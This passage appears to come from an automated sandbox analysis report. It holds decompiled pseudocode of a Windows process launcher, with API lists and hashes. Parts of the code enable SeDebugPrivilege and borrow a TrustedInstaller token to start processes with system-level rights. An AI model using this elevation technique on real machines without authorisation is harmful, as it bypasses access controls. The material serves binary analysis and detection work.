                                                                                      							L0040B1F8();
                                                                                      							_v172 = _t252;
                                                                                      							_t328 = _t328 + 0x3c;
                                                                                      							_t253 =  &_v124;
                                                                                      							_push(_t253);
                                                                                      							L0040B1F8();
                                                                                      							_v168 = _t253;
                                                                                      						}
                                                                                      						_t310 =  &(_t315[0x105]);
                                                                                      						if( *_t310 != _t286) {
                                                                                      							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                      								_push(_t310);
                                                                                      							} else {
                                                                                      								_v18236 = _t286;
                                                                                      								memset( &_v18234, _t286, 0x4000);
                                                                                      								_t328 = _t328 + 0xc;
                                                                                      								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                      								_push( &_v18236);
                                                                                      							}
                                                                                      							_push( &_v788);
                                                                                      							_push(L"\"%s\" %s");
                                                                                      							_push(0x7fff);
                                                                                      							_push( &_v83772);
                                                                                      							L0040B1EC();
                                                                                      							_v24 =  &_v83772;
                                                                                      						}
                                                                                      						_t175 = _t315[0x220c];
                                                                                      						if(_t175 != 0x20) {
                                                                                      							_v12 = _t175;
                                                                                      						}
                                                                                      						_t311 = _a4;
                                                                                      						if(_t315[0x2254] == 2) {
                                                                                      							E00401D1E(_t311, L"RunAsInvoker");
                                                                                      						}
                                                                                      						_t176 = _t315[0x265c];
                                                                                      						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                      							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                      						}
                                                                                      						_t177 = _t315[0x265e];
                                                                                      						if(_t177 != 1) {
                                                                                      							__eflags = _t177 - 2;
                                                                                      							if(_t177 != 2) {
                                                                                      								goto L37;
                                                                                      							}
                                                                                      							_push(L"16BITCOLOR");
                                                                                      							goto L36;
                                                                                      						} else {
                                                                                      							_push(L"256COLOR");
                                                                                      							L36:
                                                                                      							E00401D1E(_t311);
                                                                                      							L37:
                                                                                      							if(_t315[0x2660] == _t286) {
                                                                                      								__eflags = _t315[0x2662] - _t286;
                                                                                      								if(_t315[0x2662] == _t286) {
                                                                                      									__eflags = _t315[0x2664] - _t286;
                                                                                      									if(_t315[0x2664] == _t286) {
                                                                                      										__eflags = _t315[0x2666] - _t286;
                                                                                      										if(_t315[0x2666] == _t286) {
                                                                                      											L46:
                                                                                      											_t178 = _t315[0x2a6e];
                                                                                      											_t358 = _t178 - 3;
                                                                                      											if(_t178 != 3) {
                                                                                      												__eflags = _t178 - 2;
                                                                                      												if(_t178 != 2) {
                                                                                      													__eflags =  *_t311 - _t286;
                                                                                      													if( *_t311 == _t286) {
                                                                                      														_push(_t286);
                                                                                      													} else {
                                                                                      														_push(_t311);
                                                                                      													}
                                                                                      													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                      													L63:
                                                                                      													_t293 = _t311;
                                                                                      													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                      													_t312 = _t184;
                                                                                      													if(_t312 == _t286 && _v60 != _t286) {
                                                                                      														_t363 = _t315[0x266c] - _t286;
                                                                                      														if(_t315[0x266c] != _t286) {
                                                                                      															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                      															_a4 = _a4 | 0xffffffff;
                                                                                      															_a8 = _t286;
                                                                                      															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                      															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                      														}
                                                                                      													}
                                                                                      													E004055D1(_t184,  &_v44);
                                                                                      													return _t312;
                                                                                      												}
                                                                                      												E00405497( &_v92);
                                                                                      												E00405497( &_v228);
                                                                                      												E0040149F(__eflags,  &_v92);
                                                                                      												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                      												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                      												_t204 = _a4;
                                                                                      												__eflags =  *_a4;
                                                                                      												if(__eflags != 0) {
                                                                                      													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                      												}
                                                                                      												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                      												_t207 = _v28;
                                                                                      												__eflags = _t207;
                                                                                      												_v16 = 0x40c4e8;
                                                                                      												if(_t207 != 0) {
                                                                                      													_v16 = _t207;
                                                                                      												}
                                                                                      												_v12 = _v12 | 0x00000400;
                                                                                      												E004054B9( &_v228);
                                                                                      												E004054B9( &_v92);
                                                                                      												_t286 = 0;
                                                                                      												__eflags = 0;
                                                                                      												L58:
                                                                                      												_t315 = _a8;
                                                                                      												_t311 = _a4;
                                                                                      												goto L63;
                                                                                      											}
                                                                                      											E00405497( &_v92);
                                                                                      											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                      											_t359 =  *_t311 - _t286;
                                                                                      											if( *_t311 != _t286) {
                                                                                      												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                      											}
                                                                                      											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                      											_t219 = _v28;
                                                                                      											_v16 = 0x40c4e8;
                                                                                      											if(_t219 != _t286) {
                                                                                      												_v16 = _t219;
                                                                                      											}
                                                                                      											_v12 = _v12 | 0x00000400;
                                                                                      											E004054B9( &_v92);
                                                                                      											goto L58;
                                                                                      										}
                                                                                      										_push(L"HIGHDPIAWARE");
                                                                                      										L45:
                                                                                      										E00401D1E(_t311);
                                                                                      										goto L46;
                                                                                      									}
                                                                                      									_push(L"DISABLEDWM");
                                                                                      									goto L45;
                                                                                      								}
                                                                                      								_push(L"DISABLETHEMES");
                                                                                      								goto L45;
                                                                                      							}
                                                                                      							_push(L"640X480");
                                                                                      							goto L45;
                                                                                      						}
                                                                                      					}
                                                                                      					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                      					L10:
                                                                                      					_v20 =  &_v1316;
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}
                                                                                      0x004025c7
                                                                                      0x004025ca
                                                                                      0x004025cd
                                                                                      0x004025ce
                                                                                      0x004025d4
                                                                                      0x004025d4
                                                                                      0x004025da
                                                                                      0x004025e3
                                                                                      0x004025eb
                                                                                      0x00402633
                                                                                      0x004025fb
                                                                                      0x00402608
                                                                                      0x0040260f
                                                                                      0x00402614
                                                                                      0x00402624
                                                                                      0x00402630
                                                                                      0x00402630
                                                                                      0x0040263a
                                                                                      0x0040263b
                                                                                      0x00402646
                                                                                      0x0040264b
                                                                                      0x0040264c
                                                                                      0x0040265a
                                                                                      0x0040265a
                                                                                      0x0040265d
                                                                                      0x00402666
                                                                                      0x00402668
                                                                                      0x00402668
                                                                                      0x00402672
                                                                                      0x00402675
                                                                                      0x0040267e
                                                                                      0x0040267e
                                                                                      0x00402683
                                                                                      0x0040268b
                                                                                      0x0040269e
                                                                                      0x0040269e
                                                                                      0x004026a3
                                                                                      0x004026ac
                                                                                      0x004026b5
                                                                                      0x004026b8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026ba
                                                                                      0x00000000
                                                                                      0x004026ae
                                                                                      0x004026ae
                                                                                      0x004026bf
                                                                                      0x004026c1
                                                                                      0x004026c6
                                                                                      0x004026cc
                                                                                      0x004026d5
                                                                                      0x004026db
                                                                                      0x004026e4
                                                                                      0x004026ea
                                                                                      0x004026f3
                                                                                      0x004026f9
                                                                                      0x00402707
                                                                                      0x00402707
                                                                                      0x0040270d
                                                                                      0x00402710
                                                                                      0x0040276d
                                                                                      0x00402770
                                                                                      0x0040280b
                                                                                      0x0040280e
                                                                                      0x00402813
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402819
                                                                                      0x0040281f
                                                                                      0x00402836
                                                                                      0x00402841
                                                                                      0x00402846
                                                                                      0x0040284a
                                                                                      0x00402851
                                                                                      0x00402857
                                                                                      0x00402860
                                                                                      0x00402865
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x00402888
                                                                                      0x00402888
                                                                                      0x00402857
                                                                                      0x00402891
                                                                                      0x0040289c
                                                                                      0x0040289c
                                                                                      0x00402779
                                                                                      0x00402784
                                                                                      0x0040278d
                                                                                      0x004027a4
                                                                                      0x004027b3
                                                                                      0x004027b8
                                                                                      0x004027bb
                                                                                      0x004027bf
                                                                                      0x004027c6
                                                                                      0x004027c6
                                                                                      0x004027d1
                                                                                      0x004027d6
                                                                                      0x004027d9
                                                                                      0x004027db
                                                                                      0x004027e2
                                                                                      0x004027e4
                                                                                      0x004027e4
                                                                                      0x004027e7
                                                                                      0x004027f4
                                                                                      0x004027fc
                                                                                      0x00402801
                                                                                      0x00402801
                                                                                      0x00402803
                                                                                      0x00402803
                                                                                      0x00402806
                                                                                      0x00000000
                                                                                      0x00402806
                                                                                      0x00402715
                                                                                      0x00402729
                                                                                      0x0040272e
                                                                                      0x00402731
                                                                                      0x00402738
                                                                                      0x00402738
                                                                                      0x00402743
                                                                                      0x00402748
                                                                                      0x0040274d
                                                                                      0x00402754
                                                                                      0x00402756
                                                                                      0x00402756
                                                                                      0x00402759
                                                                                      0x00402763
                                                                                      0x00000000
                                                                                      0x00402763
                                                                                      0x004026fb
                                                                                      0x00402700
                                                                                      0x00402702
                                                                                      0x00000000
                                                                                      0x00402702
                                                                                      0x004026ec
                                                                                      0x00000000
                                                                                      0x004026ec
                                                                                      0x004026dd
                                                                                      0x00000000
                                                                                      0x004026dd
                                                                                      0x004026ce
                                                                                      0x00000000
                                                                                      0x004026ce
                                                                                      0x004026ac
                                                                                      0x00402443
                                                                                      0x0040246a
                                                                                      0x00402470
                                                                                      0x00000000
                                                                                      0x00402470

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402300
                                                                                      • memset.MSVCRT ref: 0040233E
                                                                                      • memset.MSVCRT ref: 00402356
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                      • wcschr.MSVCRT ref: 00402387
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                        • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                        • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                      • wcschr.MSVCRT ref: 004023B7
                                                                                      • memset.MSVCRT ref: 004023D9
                                                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                      • wcschr.MSVCRT ref: 0040242B
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                      • memset.MSVCRT ref: 004024BE
                                                                                      • memset.MSVCRT ref: 004024D1
                                                                                      • _wtoi.MSVCRT ref: 00402519
                                                                                      • _wtoi.MSVCRT ref: 0040252B
                                                                                      • memset.MSVCRT ref: 00402561
                                                                                      • memset.MSVCRT ref: 00402574
                                                                                      • _wtoi.MSVCRT ref: 004025BC
                                                                                      • _wtoi.MSVCRT ref: 004025CE
                                                                                      • wcschr.MSVCRT ref: 004025F0
                                                                                      • memset.MSVCRT ref: 0040260F
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                      • _snwprintf.MSVCRT ref: 0040264C
                                                                                      • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                      • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                      • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                      • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                      • API String ID: 2452314994-435178042
                                                                                      • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                      • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                      				char _v0;
                                                                                      				WCHAR* _v4;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t76;
                                                                                      				void* _t82;
                                                                                      				wchar_t* _t85;
                                                                                      				void* _t86;
                                                                                      				void* _t87;
                                                                                      				intOrPtr _t92;
                                                                                      				wchar_t* _t93;
                                                                                      				intOrPtr _t95;
                                                                                      				int _t106;
                                                                                      				char* _t110;
                                                                                      				intOrPtr _t115;
                                                                                      				wchar_t* _t117;
                                                                                      				intOrPtr _t124;
                                                                                      				wchar_t* _t125;
                                                                                      				intOrPtr _t131;
                                                                                      				wchar_t* _t132;
                                                                                      				int _t154;
                                                                                      				int _t156;
                                                                                      				void* _t159;
                                                                                      				intOrPtr _t162;
                                                                                      				void* _t177;
                                                                                      				void* _t178;
                                                                                      				void* _t179;
                                                                                      				intOrPtr _t181;
                                                                                      				int _t187;
                                                                                      				intOrPtr _t188;
                                                                                      				intOrPtr _t190;
                                                                                      				intOrPtr _t198;
                                                                                      				signed int _t205;
                                                                                      				signed int _t206;
                                                                                      
                                                                                      				_t179 = __edx;
                                                                                      				_t158 = __ecx;
                                                                                      				_t206 = _t205 & 0xfffffff8;
                                                                                      				E0040B550(0x1ccc, __ecx);
                                                                                      				_t76 = E0040313D(_t158);
                                                                                      				if(_t76 != 0) {
                                                                                      					E0040AC52();
                                                                                      					SetErrorMode(0x8001); // executed
                                                                                      					_t156 = 0;
                                                                                      					 *0x40fa70 = 0x11223344;
                                                                                      					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                      					_t82 = E00405497( &_a8);
                                                                                      					_a48 = 0x20;
                                                                                      					_a40 = 0;
                                                                                      					_a52 = 0;
                                                                                      					_a44 = 0;
                                                                                      					_a56 = 0;
                                                                                      					E004056B5(_t158, __eflags, _t82, _a12); // executed
                                                                                      					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                      					 *_t206 = L"/SpecialRun";
                                                                                      					_t85 = E0040585C( &_v0);
                                                                                      					__eflags = _t85;
                                                                                      					if(_t85 != 0) {
                                                                                      						L8:
                                                                                      						_t86 = E0040585C( &_a8, L"/Run");
                                                                                      						__eflags = _t86 - _t156;
                                                                                      						if(_t86 < _t156) {
                                                                                      							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                      							__eflags = _t87 - _t156;
                                                                                      							if(_t87 >= _t156) {
                                                                                      								_t162 =  *0x40fa74; // 0x4101c8
                                                                                      								_t41 = _t87 + 1; // 0x1
                                                                                      								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                      								_t115 =  *0x40fa74; // 0x4101c8
                                                                                      								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                      								__eflags = _t117;
                                                                                      								if(_t117 == 0) {
                                                                                      									_a92 = _t156;
                                                                                      									memset( &_a94, _t156, 0x208);
                                                                                      									_a620 = _t156;
                                                                                      									memset( &_a622, _t156, 0x208);
                                                                                      									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                      									_t124 =  *0x40fa74; // 0x4101c8
                                                                                      									_t125 = _t124 + 0x5504;
                                                                                      									_v4 = _t125;
                                                                                      									_t187 = wcslen(_t125);
                                                                                      									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                      									__eflags = _t187 + _t51 - 0x104;
                                                                                      									if(_t187 + _t51 >= 0x104) {
                                                                                      										_a620 = _t156;
                                                                                      									} else {
                                                                                      										E00404BE4( &_a620,  &_a92, _v4);
                                                                                      									}
                                                                                      									_t131 =  *0x40fa74; // 0x4101c8
                                                                                      									_t132 = _t131 + 0x5504;
                                                                                      									__eflags = _t132;
                                                                                      									wcscpy(_t132,  &_a620);
                                                                                      								}
                                                                                      							}
                                                                                      							E00402F31(_t156);
                                                                                      							_t181 =  *0x40fa74; // 0x4101c8
                                                                                      							_pop(_t159);
                                                                                      							_a84 =  &_a8;
                                                                                      							_a76 = 0x40cb0c;
                                                                                      							_a88 = _t156;
                                                                                      							_a80 = _t156;
                                                                                      							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                      							_t92 =  *0x40fa74; // 0x4101c8
                                                                                      							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                      							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                      								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                      								__eflags = _t93;
                                                                                      								if(_t93 < 0) {
                                                                                      									E00406420();
                                                                                      									__imp__CoInitialize(_t156);
                                                                                      									_t95 =  *0x40fa74; // 0x4101c8
                                                                                      									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                      									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                      									_t198 =  *0x40fa74; // 0x4101c8
                                                                                      									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                      									E00402F31(1);
                                                                                      									__imp__CoUninitialize();
                                                                                      								} else {
                                                                                      									E004065BE(_t159);
                                                                                      								}
                                                                                      								goto L7;
                                                                                      							} else {
                                                                                      								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                      								_a7356 = _t156;
                                                                                      								_a7352 = _t156;
                                                                                      								_a7340 = _t156;
                                                                                      								_a7344 = _t156;
                                                                                      								_a7348 = _t156;
                                                                                      								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                      								_t110 =  &_a5288;
                                                                                      								L6:
                                                                                      								E004035FB(_t110);
                                                                                      								L7:
                                                                                      								E004054B9( &_v0);
                                                                                      								E004099D4( &_a32);
                                                                                      								E004054B9( &_v0);
                                                                                      								_t106 = _t156;
                                                                                      								goto L2;
                                                                                      							}
                                                                                      						}
                                                                                      						_t26 = _t86 + 1; // 0x1
                                                                                      						_t173 = _t26;
                                                                                      						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                      						if(__eflags == 0) {
                                                                                      							E00402F31(_t156);
                                                                                      						} else {
                                                                                      							E00402FC6(_t173, __eflags, _t138);
                                                                                      						}
                                                                                      						_t188 =  *0x40fa74; // 0x4101c8
                                                                                      						_a68 =  &_a8;
                                                                                      						_a60 = 0x40cb0c;
                                                                                      						_a72 = _t156;
                                                                                      						_a64 = _t156;
                                                                                      						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                      						_t190 =  *0x40fa74; // 0x4101c8
                                                                                      						_a5280 = _t156;
                                                                                      						_a5276 = _t156;
                                                                                      						_a5264 = _t156;
                                                                                      						_a5268 = _t156;
                                                                                      						_a5272 = _t156;
                                                                                      						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                      						_t110 =  &_a3212;
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					__eflags = _a56 - 3;
                                                                                      					if(_a56 != 3) {
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					__eflags = 1;
                                                                                      					_a3212 = 0;
                                                                                      					_a3208 = 0;
                                                                                      					_a3196 = 0;
                                                                                      					_a3200 = 0;
                                                                                      					_a3204 = 0;
                                                                                      					_v4 = 0;
                                                                                      					_v0 = 0;
                                                                                      					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                      					_t177 = 2;
                                                                                      					_push(E0040584C( &_v0, _t177));
                                                                                      					L0040B1F8();
                                                                                      					_pop(_t178);
                                                                                      					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
                                                                                      					_t156 = _t154;
                                                                                      					_t110 =  &_a1132;
                                                                                      					goto L6;
                                                                                      				} else {
                                                                                      					_t106 = _t76 + 1;
                                                                                      					L2:
                                                                                      					return _t106;
                                                                                      				}
                                                                                      			}






































                                                                                      APIs
                                                                                        • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                        • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                        • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                        • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                      • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                      • swscanf.MSVCRT ref: 00408620
                                                                                      • _wtoi.MSVCRT ref: 00408633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                      • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                      • API String ID: 3933224404-3784219877
                                                                                      • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                      • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                      • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                      • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 81%
                                                                                      			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                      				int _v8;
                                                                                      				long _v12;
                                                                                      				wchar_t* _v16;
                                                                                      				void _v546;
                                                                                      				long _v548;
                                                                                      				void _v1074;
                                                                                      				char _v1076;
                                                                                      				void* __esi;
                                                                                      				long _t84;
                                                                                      				int _t87;
                                                                                      				wchar_t* _t88;
                                                                                      				int _t92;
                                                                                      				void* _t93;
                                                                                      				int _t94;
                                                                                      				int _t96;
                                                                                      				int _t99;
                                                                                      				int _t104;
                                                                                      				long _t105;
                                                                                      				int _t110;
                                                                                      				void** _t112;
                                                                                      				int _t113;
                                                                                      				intOrPtr _t131;
                                                                                      				wchar_t* _t132;
                                                                                      				int* _t148;
                                                                                      				wchar_t* _t149;
                                                                                      				int _t151;
                                                                                      				void* _t152;
                                                                                      				void* _t153;
                                                                                      				int _t154;
                                                                                      				void* _t155;
                                                                                      				long _t160;
                                                                                      
                                                                                      				_t145 = __edx;
                                                                                      				_t152 = __ecx;
                                                                                      				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                      				_v12 = 0;
                                                                                      				if(_t131 != 4) {
                                                                                      					__eflags = _t131 - 5;
                                                                                      					if(_t131 != 5) {
                                                                                      						__eflags = _t131 - 9;
                                                                                      						if(__eflags != 0) {
                                                                                      							__eflags = _t131 - 8;
                                                                                      							if(_t131 != 8) {
                                                                                      								__eflags = _t131 - 6;
                                                                                      								if(_t131 != 6) {
                                                                                      									__eflags = _t131 - 7;
                                                                                      									if(_t131 != 7) {
                                                                                      										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                      									} else {
                                                                                      										_t132 = __eax + 0x46b6;
                                                                                      										_t148 = __eax + 0x48b6;
                                                                                      										__eflags =  *_t148;
                                                                                      										_v16 = _t132;
                                                                                      										_v8 = __eax + 0x4ab6;
                                                                                      										if( *_t148 == 0) {
                                                                                      											_t88 = wcschr(_t132, 0x40);
                                                                                      											__eflags = _t88;
                                                                                      											if(_t88 != 0) {
                                                                                      												_t148 = 0;
                                                                                      												__eflags = 0;
                                                                                      											}
                                                                                      										}
                                                                                      										_t153 = _t152 + 0x800;
                                                                                      										E0040289F(_t153);
                                                                                      										_t154 =  *(_t153 + 0xc);
                                                                                      										__eflags = _t154;
                                                                                      										if(_t154 == 0) {
                                                                                      											_t87 = 0;
                                                                                      											__eflags = 0;
                                                                                      										} else {
                                                                                      											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                      										}
                                                                                      										__eflags = _t87;
                                                                                      									}
                                                                                      									if(__eflags == 0) {
                                                                                      										_t84 = GetLastError();
                                                                                      										L43:
                                                                                      										_v12 = _t84;
                                                                                      									}
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                      								if(__eflags == 0) {
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                      								__eflags = _t92;
                                                                                      								if(_t92 != 0) {
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t84 = _a28;
                                                                                      								goto L43;
                                                                                      							}
                                                                                      							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                      							__eflags = _t93;
                                                                                      							if(_t93 != 0) {
                                                                                      								E00401306(_t93); // executed
                                                                                      							}
                                                                                      							_v8 = 0;
                                                                                      							_t94 = E00401F04(_t145, _t152); // executed
                                                                                      							__eflags = _t94;
                                                                                      							_v12 = _t94;
                                                                                      							if(__eflags == 0) {
                                                                                      								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                      								__eflags = _t96;
                                                                                      								_v12 = _t96;
                                                                                      								if(_t96 == 0) {
                                                                                      									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                      									__eflags = _t99;
                                                                                      									if(_t99 == 0) {
                                                                                      										_v12 = GetLastError();
                                                                                      									}
                                                                                      									CloseHandle(_v8); // executed
                                                                                      								}
                                                                                      								RevertToSelf(); // executed
                                                                                      							}
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                      						__eflags = _t104;
                                                                                      						if(_t104 == 0) {
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_v8 = 0;
                                                                                      						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t149 = __eax + 0x44ac;
                                                                                      					_t110 = wcslen(_t149);
                                                                                      					__eflags = _t110;
                                                                                      					if(_t110 <= 0) {
                                                                                      						goto L44;
                                                                                      					} else {
                                                                                      						_v8 = 0;
                                                                                      						__eflags = E00404EA9(_t149, _t110);
                                                                                      						_t112 =  &_v8;
                                                                                      						_push(_t112);
                                                                                      						_push(_t149);
                                                                                      						if(__eflags == 0) {
                                                                                      							_push(_t152);
                                                                                      							_t113 = E00401DF9(_t145, __eflags);
                                                                                      						} else {
                                                                                      							L0040B1F8();
                                                                                      							_push(_t112);
                                                                                      							_push(_t152);
                                                                                      							_t113 = E00401E44();
                                                                                      						}
                                                                                      						_v12 = _t113;
                                                                                      						__eflags = _t113;
                                                                                      						goto L15;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v548 = 0;
